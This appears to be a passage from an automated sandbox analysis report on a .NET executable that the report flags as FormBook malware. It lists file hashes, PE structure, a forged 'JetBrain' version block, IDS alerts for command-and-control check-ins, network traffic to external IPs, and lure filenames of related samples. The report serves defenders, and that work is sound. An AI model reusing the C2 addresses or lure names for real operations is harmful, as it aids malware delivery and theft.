                                                                      com.duolingo_1162_apps.evozi.com.apkGet hashmaliciousBrowse
                                                                      • 52.222.174.5
                                                                      rnPij0Z886.dllGet hashmaliciousBrowse
                                                                      • 13.224.91.73
                                                                      Plex-v8.7.1.20931_build_812981296-armeabi-v7a(Apkgod.net).apkGet hashmaliciousBrowse
                                                                      • 99.81.164.127
                                                                      Nota Fiscal Eletronica 00111834.msiGet hashmaliciousBrowse
                                                                      • 54.171.246.133
                                                                      #U00a0Import Custom Duty invoice & its clearance documents.exeGet hashmaliciousBrowse
                                                                      • 75.2.26.18
                                                                      919780-920390.exeGet hashmaliciousBrowse
                                                                      • 99.83.162.16
                                                                      SQUARESPACEUSSKlGhwkzTi.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144
                                                                      New Purchase Order20210609.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144
                                                                      LkvumUsaQX.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144
                                                                      Payment slip.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144
                                                                      New Order Vung Ang TPP Viet Nam.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144
                                                                      tzeEeC2CBA.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144
                                                                      8mnXkjPdP0.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144
                                                                      17jLieeOPx.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144
                                                                      fMWJqYA8ae.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144
                                                                      scan-copy059950059pdf.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144
                                                                      SKMBT_C224307532DL23457845_Product Order doc.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144
                                                                      rove.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144
                                                                      Failure Notice Details PDF.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144
                                                                      1092991(JB#082).exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144
                                                                      Payment SWIFT_Pdf.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144
                                                                      #U20ac9,770 pdf.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144
                                                                      HEN.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144
                                                                      Taisier Med Surgical Sutures.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144
                                                                      Purchase Order.pdf.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144
                                                                      DHL_119045_Receipt document,pdf.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\lTAPQJikGw.exe.log
                                                                      Process:C:\Users\user\Desktop\lTAPQJikGw.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1314
                                                                      Entropy (8bit):5.350128552078965
                                                                      Encrypted:false
                                                                      SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                                      MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                                      SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                                      SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                                      SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                                      Malicious:true
                                                                      Reputation:high, very likely benign file
                                                                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Entropy (8bit):7.529224716638736
                                                                      TrID:
                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                      File name:lTAPQJikGw.exe
                                                                      File size:865792
                                                                      MD5:16657fa097cd334973a5489eeff8bafe
                                                                      SHA1:b6db5e9cc112155b7285f0a415cf4889ff1bf7ef
                                                                      SHA256:2589143d02f6aef252b5b704f6b98723ae131d3279bcf36d57ee26318bc0741f
                                                                      SHA512:982bfb6516d594a13ea987a878aed98125679b2a607a855b6a78283ce58da258a925faa75f8e72d25d591b6514bcc8786ec05231c2d0ebdd80ff2ec9931d4ec2
                                                                      SSDEEP:12288:TTHukblMV40uUSeQdQtq02pd55BcAbTDIbd5uIiDLuaCwH3:TqkbUuUxQh02pdnBcAbXedOLnCwH
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f..`..............P..............4... ...@....@.. ....................................@................................

                                                                      File Icon

                                                                      Icon Hash:f0e1e0b2b2ccb2cc

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x4a340e
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                      Time Stamp:0x60C10566 [Wed Jun 9 18:16:06 2021 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:v4.0.30319
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      jmp dword ptr [00402000h]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xa33bc0x4f.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xa40000x31a4c.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xd60000xc.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xa32840x1c.text
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x20000xa14140xa1600False0.843792360573SysEx File - Clavia7.73125493594IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                      .rsrc0xa40000x31a4c0x31c00False0.442927528266data6.16976587686IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .reloc0xd60000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountry
                                                                      RT_ICON0xa42000x99e7PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                      RT_ICON0xadbf80x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                                                      RT_ICON0xbe4300x94a8data
                                                                      RT_ICON0xc78e80x5488data
                                                                      RT_ICON0xccd800x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 254, next used block 2130706432
                                                                      RT_ICON0xd0fb80x25a8data
                                                                      RT_ICON0xd35700x10a8data
                                                                      RT_ICON0xd46280x988data
                                                                      RT_ICON0xd4fc00x468GLS_BINARY_LSB_FIRST
                                                                      RT_GROUP_ICON0xd54380x84data
                                                                      RT_VERSION0xd54cc0x380data
                                                                      RT_MANIFEST0xd585c0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                      Imports

                                                                      DLLImport
                                                                      mscoree.dll_CorExeMain

                                                                      Version Infos

                                                                      DescriptionData
                                                                      Translation0x0000 0x04b0
                                                                      LegalCopyrightCopyright 2003 - 2021
                                                                      Assembly Version7.0.5.0
                                                                      InternalNameCryptoConfig.exe
                                                                      FileVersion7.0.5.0
                                                                      CompanyNameJet Brain Inc.
                                                                      LegalTrademarks
                                                                      Comments
                                                                      ProductNameJetBrain Assemblies
                                                                      ProductVersion7.0.5.0
                                                                      FileDescriptionJetBrain Assemblies
                                                                      OriginalFilenameCryptoConfig.exe

                                                                      Network Behavior

                                                                      Snort IDS Alerts

                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                      06/10/21-18:08:06.041509TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976580192.168.2.474.220.199.8
                                                                      06/10/21-18:08:06.041509TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976580192.168.2.474.220.199.8
                                                                      06/10/21-18:08:06.041509TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976580192.168.2.474.220.199.8
                                                                      06/10/21-18:08:23.084972TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976880192.168.2.4199.195.117.147
                                                                      06/10/21-18:08:23.084972TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976880192.168.2.4199.195.117.147
                                                                      06/10/21-18:08:23.084972TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976880192.168.2.4199.195.117.147
                                                                      06/10/21-18:08:34.522965TCP1201ATTACK-RESPONSES 403 Forbidden804977299.83.154.118192.168.2.4
                                                                      06/10/21-18:08:55.714557TCP2031453ET TROJAN FormBook CnC Checkin (GET)4977680192.168.2.4104.21.15.16
                                                                      06/10/21-18:08:55.714557TCP2031449ET TROJAN FormBook CnC Checkin (GET)4977680192.168.2.4104.21.15.16
                                                                      06/10/21-18:08:55.714557TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977680192.168.2.4104.21.15.16

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jun 10, 2021 18:07:54.164665937 CEST4976380192.168.2.4147.255.162.204
                                                                      Jun 10, 2021 18:07:54.359803915 CEST8049763147.255.162.204192.168.2.4
                                                                      Jun 10, 2021 18:07:54.359915018 CEST4976380192.168.2.4147.255.162.204
                                                                      Jun 10, 2021 18:07:54.360044956 CEST4976380192.168.2.4147.255.162.204
                                                                      Jun 10, 2021 18:07:54.556164026 CEST8049763147.255.162.204192.168.2.4
                                                                      Jun 10, 2021 18:07:54.556201935 CEST8049763147.255.162.204192.168.2.4
                                                                      Jun 10, 2021 18:07:54.556276083 CEST8049763147.255.162.204192.168.2.4
                                                                      Jun 10, 2021 18:07:54.556405067 CEST8049763147.255.162.204192.168.2.4
                                                                      Jun 10, 2021 18:07:54.556427956 CEST8049763147.255.162.204192.168.2.4
                                                                      Jun 10, 2021 18:07:54.556442976 CEST4976380192.168.2.4147.255.162.204
                                                                      Jun 10, 2021 18:07:54.556504965 CEST4976380192.168.2.4147.255.162.204
                                                                      Jun 10, 2021 18:07:54.556608915 CEST4976380192.168.2.4147.255.162.204
                                                                      Jun 10, 2021 18:07:59.927434921 CEST4976480192.168.2.4163.44.239.73
                                                                      Jun 10, 2021 18:08:00.230904102 CEST8049764163.44.239.73192.168.2.4
                                                                      Jun 10, 2021 18:08:00.232320070 CEST4976480192.168.2.4163.44.239.73
                                                                      Jun 10, 2021 18:08:00.232477903 CEST4976480192.168.2.4163.44.239.73
                                                                      Jun 10, 2021 18:08:00.535759926 CEST8049764163.44.239.73192.168.2.4
                                                                      Jun 10, 2021 18:08:00.626985073 CEST8049764163.44.239.73192.168.2.4
                                                                      Jun 10, 2021 18:08:00.627013922 CEST8049764163.44.239.73192.168.2.4
                                                                      Jun 10, 2021 18:08:00.627228975 CEST4976480192.168.2.4163.44.239.73
                                                                      Jun 10, 2021 18:08:00.627295017 CEST4976480192.168.2.4163.44.239.73
                                                                      Jun 10, 2021 18:08:00.929238081 CEST8049764163.44.239.73192.168.2.4
                                                                      Jun 10, 2021 18:08:05.850341082 CEST4976580192.168.2.474.220.199.8
                                                                      Jun 10, 2021 18:08:06.041214943 CEST804976574.220.199.8192.168.2.4
                                                                      Jun 10, 2021 18:08:06.041311026 CEST4976580192.168.2.474.220.199.8
                                                                      Jun 10, 2021 18:08:06.041508913 CEST4976580192.168.2.474.220.199.8
                                                                      Jun 10, 2021 18:08:06.536820889 CEST4976580192.168.2.474.220.199.8
                                                                      Jun 10, 2021 18:08:06.552520037 CEST4976580192.168.2.474.220.199.8
                                                                      Jun 10, 2021 18:08:06.723648071 CEST804976574.220.199.8192.168.2.4
                                                                      Jun 10, 2021 18:08:06.724903107 CEST804976574.220.199.8192.168.2.4
                                                                      Jun 10, 2021 18:08:06.724936008 CEST804976574.220.199.8192.168.2.4
                                                                      Jun 10, 2021 18:08:06.724961042 CEST804976574.220.199.8192.168.2.4
                                                                      Jun 10, 2021 18:08:06.724983931 CEST804976574.220.199.8192.168.2.4
                                                                      Jun 10, 2021 18:08:06.724997997 CEST4976580192.168.2.474.220.199.8
                                                                      Jun 10, 2021 18:08:06.724999905 CEST804976574.220.199.8192.168.2.4
                                                                      Jun 10, 2021 18:08:06.725017071 CEST804976574.220.199.8192.168.2.4
                                                                      Jun 10, 2021 18:08:06.725037098 CEST4976580192.168.2.474.220.199.8
                                                                      Jun 10, 2021 18:08:06.725086927 CEST4976580192.168.2.474.220.199.8
                                                                      Jun 10, 2021 18:08:06.726949930 CEST4976580192.168.2.474.220.199.8
                                                                      Jun 10, 2021 18:08:06.739317894 CEST804976574.220.199.8192.168.2.4
                                                                      Jun 10, 2021 18:08:06.739464045 CEST4976580192.168.2.474.220.199.8
                                                                      Jun 10, 2021 18:08:11.661992073 CEST4976680192.168.2.4172.107.55.6
                                                                      Jun 10, 2021 18:08:11.820837021 CEST8049766172.107.55.6192.168.2.4
                                                                      Jun 10, 2021 18:08:11.821013927 CEST4976680192.168.2.4172.107.55.6
                                                                      Jun 10, 2021 18:08:11.821222067 CEST4976680192.168.2.4172.107.55.6
                                                                      Jun 10, 2021 18:08:11.980761051 CEST8049766172.107.55.6192.168.2.4
                                                                      Jun 10, 2021 18:08:12.061254978 CEST8049766172.107.55.6192.168.2.4
                                                                      Jun 10, 2021 18:08:12.061285973 CEST8049766172.107.55.6192.168.2.4
                                                                      Jun 10, 2021 18:08:12.061460018 CEST4976680192.168.2.4172.107.55.6
                                                                      Jun 10, 2021 18:08:12.061542988 CEST4976680192.168.2.4172.107.55.6
                                                                      Jun 10, 2021 18:08:12.218924999 CEST8049766172.107.55.6192.168.2.4
                                                                      Jun 10, 2021 18:08:17.318051100 CEST4976780192.168.2.454.69.66.227
                                                                      Jun 10, 2021 18:08:17.524992943 CEST804976754.69.66.227192.168.2.4
                                                                      Jun 10, 2021 18:08:17.525393009 CEST4976780192.168.2.454.69.66.227
                                                                      Jun 10, 2021 18:08:17.525732040 CEST4976780192.168.2.454.69.66.227
                                                                      Jun 10, 2021 18:08:17.731508970 CEST804976754.69.66.227192.168.2.4
                                                                      Jun 10, 2021 18:08:17.743844032 CEST804976754.69.66.227192.168.2.4
                                                                      Jun 10, 2021 18:08:17.743889093 CEST804976754.69.66.227192.168.2.4
                                                                      Jun 10, 2021 18:08:17.744141102 CEST4976780192.168.2.454.69.66.227
                                                                      Jun 10, 2021 18:08:17.744194031 CEST4976780192.168.2.454.69.66.227
                                                                      Jun 10, 2021 18:08:17.950335979 CEST804976754.69.66.227192.168.2.4
                                                                      Jun 10, 2021 18:08:22.932153940 CEST4976880192.168.2.4199.195.117.147
                                                                      Jun 10, 2021 18:08:23.084594011 CEST8049768199.195.117.147192.168.2.4
                                                                      Jun 10, 2021 18:08:23.084788084 CEST4976880192.168.2.4199.195.117.147
                                                                      Jun 10, 2021 18:08:23.084971905 CEST4976880192.168.2.4199.195.117.147
                                                                      Jun 10, 2021 18:08:23.237189054 CEST8049768199.195.117.147192.168.2.4
                                                                      Jun 10, 2021 18:08:23.239788055 CEST8049768199.195.117.147192.168.2.4
                                                                      Jun 10, 2021 18:08:23.240160942 CEST8049768199.195.117.147192.168.2.4
                                                                      Jun 10, 2021 18:08:23.240279913 CEST4976880192.168.2.4199.195.117.147
                                                                      Jun 10, 2021 18:08:23.240338087 CEST4976880192.168.2.4199.195.117.147
                                                                      Jun 10, 2021 18:08:23.394629002 CEST8049768199.195.117.147192.168.2.4
                                                                      Jun 10, 2021 18:08:28.335777044 CEST4976980192.168.2.4156.241.53.161
                                                                      Jun 10, 2021 18:08:28.562704086 CEST8049769156.241.53.161192.168.2.4
                                                                      Jun 10, 2021 18:08:28.562905073 CEST4976980192.168.2.4156.241.53.161
                                                                      Jun 10, 2021 18:08:28.563146114 CEST4976980192.168.2.4156.241.53.161
                                                                      Jun 10, 2021 18:08:28.789860010 CEST8049769156.241.53.161192.168.2.4
                                                                      Jun 10, 2021 18:08:29.070154905 CEST4976980192.168.2.4156.241.53.161
                                                                      Jun 10, 2021 18:08:29.303756952 CEST8049769156.241.53.161192.168.2.4
                                                                      Jun 10, 2021 18:08:29.303797960 CEST8049769156.241.53.161192.168.2.4
                                                                      Jun 10, 2021 18:08:29.303965092 CEST4976980192.168.2.4156.241.53.161
                                                                      Jun 10, 2021 18:08:29.304640055 CEST4976980192.168.2.4156.241.53.161
                                                                      Jun 10, 2021 18:08:34.289700985 CEST4977280192.168.2.499.83.154.118
                                                                      Jun 10, 2021 18:08:34.334131956 CEST804977299.83.154.118192.168.2.4
                                                                      Jun 10, 2021 18:08:34.334474087 CEST4977280192.168.2.499.83.154.118
                                                                      Jun 10, 2021 18:08:34.334511042 CEST4977280192.168.2.499.83.154.118
                                                                      Jun 10, 2021 18:08:34.376698971 CEST804977299.83.154.118192.168.2.4
                                                                      Jun 10, 2021 18:08:34.522964954 CEST804977299.83.154.118192.168.2.4
                                                                      Jun 10, 2021 18:08:34.523000002 CEST804977299.83.154.118192.168.2.4
                                                                      Jun 10, 2021 18:08:34.523241043 CEST4977280192.168.2.499.83.154.118
                                                                      Jun 10, 2021 18:08:34.527183056 CEST4977280192.168.2.499.83.154.118
                                                                      Jun 10, 2021 18:08:34.545643091 CEST804977299.83.154.118192.168.2.4
                                                                      Jun 10, 2021 18:08:34.546340942 CEST4977280192.168.2.499.83.154.118
                                                                      Jun 10, 2021 18:08:34.569499016 CEST804977299.83.154.118192.168.2.4
                                                                      Jun 10, 2021 18:08:39.602478981 CEST4977380192.168.2.4198.54.117.216
                                                                      Jun 10, 2021 18:08:39.800178051 CEST8049773198.54.117.216192.168.2.4
                                                                      Jun 10, 2021 18:08:39.800331116 CEST4977380192.168.2.4198.54.117.216
                                                                      Jun 10, 2021 18:08:39.800529003 CEST4977380192.168.2.4198.54.117.216
                                                                      Jun 10, 2021 18:08:39.998404980 CEST8049773198.54.117.216192.168.2.4
                                                                      Jun 10, 2021 18:08:39.998456001 CEST8049773198.54.117.216192.168.2.4
                                                                      Jun 10, 2021 18:08:45.103743076 CEST4977480192.168.2.4198.185.159.144
                                                                      Jun 10, 2021 18:08:45.237399101 CEST8049774198.185.159.144192.168.2.4
                                                                      Jun 10, 2021 18:08:45.237560987 CEST4977480192.168.2.4198.185.159.144
                                                                      Jun 10, 2021 18:08:45.237778902 CEST4977480192.168.2.4198.185.159.144
                                                                      Jun 10, 2021 18:08:45.371453047 CEST8049774198.185.159.144192.168.2.4
                                                                      Jun 10, 2021 18:08:45.409755945 CEST8049774198.185.159.144192.168.2.4
                                                                      Jun 10, 2021 18:08:45.409797907 CEST8049774198.185.159.144192.168.2.4
                                                                      Jun 10, 2021 18:08:45.409826040 CEST8049774198.185.159.144192.168.2.4
                                                                      Jun 10, 2021 18:08:45.409846067 CEST8049774198.185.159.144192.168.2.4
                                                                      Jun 10, 2021 18:08:45.409871101 CEST8049774198.185.159.144192.168.2.4
                                                                      Jun 10, 2021 18:08:45.409894943 CEST8049774198.185.159.144192.168.2.4
                                                                      Jun 10, 2021 18:08:45.409918070 CEST8049774198.185.159.144192.168.2.4
                                                                      Jun 10, 2021 18:08:45.409940004 CEST8049774198.185.159.144192.168.2.4
                                                                      Jun 10, 2021 18:08:45.409962893 CEST8049774198.185.159.144192.168.2.4
                                                                      Jun 10, 2021 18:08:45.409986973 CEST8049774198.185.159.144192.168.2.4
                                                                      Jun 10, 2021 18:08:45.410096884 CEST4977480192.168.2.4198.185.159.144
                                                                      Jun 10, 2021 18:08:45.410152912 CEST4977480192.168.2.4198.185.159.144
                                                                      Jun 10, 2021 18:08:45.410229921 CEST4977480192.168.2.4198.185.159.144
                                                                      Jun 10, 2021 18:08:45.544152975 CEST8049774198.185.159.144192.168.2.4
                                                                      Jun 10, 2021 18:08:45.544214010 CEST8049774198.185.159.144192.168.2.4
                                                                      Jun 10, 2021 18:08:45.544251919 CEST8049774198.185.159.144192.168.2.4
                                                                      Jun 10, 2021 18:08:45.544291019 CEST8049774198.185.159.144192.168.2.4
                                                                      Jun 10, 2021 18:08:45.544290066 CEST4977480192.168.2.4198.185.159.144
                                                                      Jun 10, 2021 18:08:45.544348001 CEST4977480192.168.2.4198.185.159.144
                                                                      Jun 10, 2021 18:08:50.480931997 CEST4977580192.168.2.478.31.67.91
                                                                      Jun 10, 2021 18:08:50.533935070 CEST804977578.31.67.91192.168.2.4
                                                                      Jun 10, 2021 18:08:50.534074068 CEST4977580192.168.2.478.31.67.91
                                                                      Jun 10, 2021 18:08:50.534192085 CEST4977580192.168.2.478.31.67.91
                                                                      Jun 10, 2021 18:08:50.589061975 CEST804977578.31.67.91192.168.2.4
                                                                      Jun 10, 2021 18:08:50.589107037 CEST804977578.31.67.91192.168.2.4
                                                                      Jun 10, 2021 18:08:50.589123964 CEST804977578.31.67.91192.168.2.4
                                                                      Jun 10, 2021 18:08:50.589318991 CEST4977580192.168.2.478.31.67.91
                                                                      Jun 10, 2021 18:08:50.589365005 CEST4977580192.168.2.478.31.67.91
                                                                      Jun 10, 2021 18:08:50.644109964 CEST804977578.31.67.91192.168.2.4

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jun 10, 2021 18:06:41.407711983 CEST5453153192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:06:41.458219051 CEST53545318.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:06:42.566379070 CEST4971453192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:06:42.618700981 CEST53497148.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:06:44.812927961 CEST5802853192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:06:44.864168882 CEST53580288.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:06:46.021019936 CEST5309753192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:06:46.074609041 CEST53530978.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:06:47.375886917 CEST4925753192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:06:47.431807041 CEST53492578.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:06:48.176485062 CEST6238953192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:06:48.228964090 CEST53623898.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:06:49.382594109 CEST4991053192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:06:49.435808897 CEST53499108.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:06:50.570723057 CEST5585453192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:06:50.625188112 CEST53558548.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:06:51.416126013 CEST6454953192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:06:51.466497898 CEST53645498.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:06:52.653862953 CEST6315353192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:06:52.704343081 CEST53631538.8.8.8192.168.2.4
                                                                      Jun 10, 2021 18:06:53.551484108 CEST5299153192.168.2.48.8.8.8
                                                                      Jun 10, 2021 18:06:53.601452112 CEST53529918.8.8.8192.168.2.4
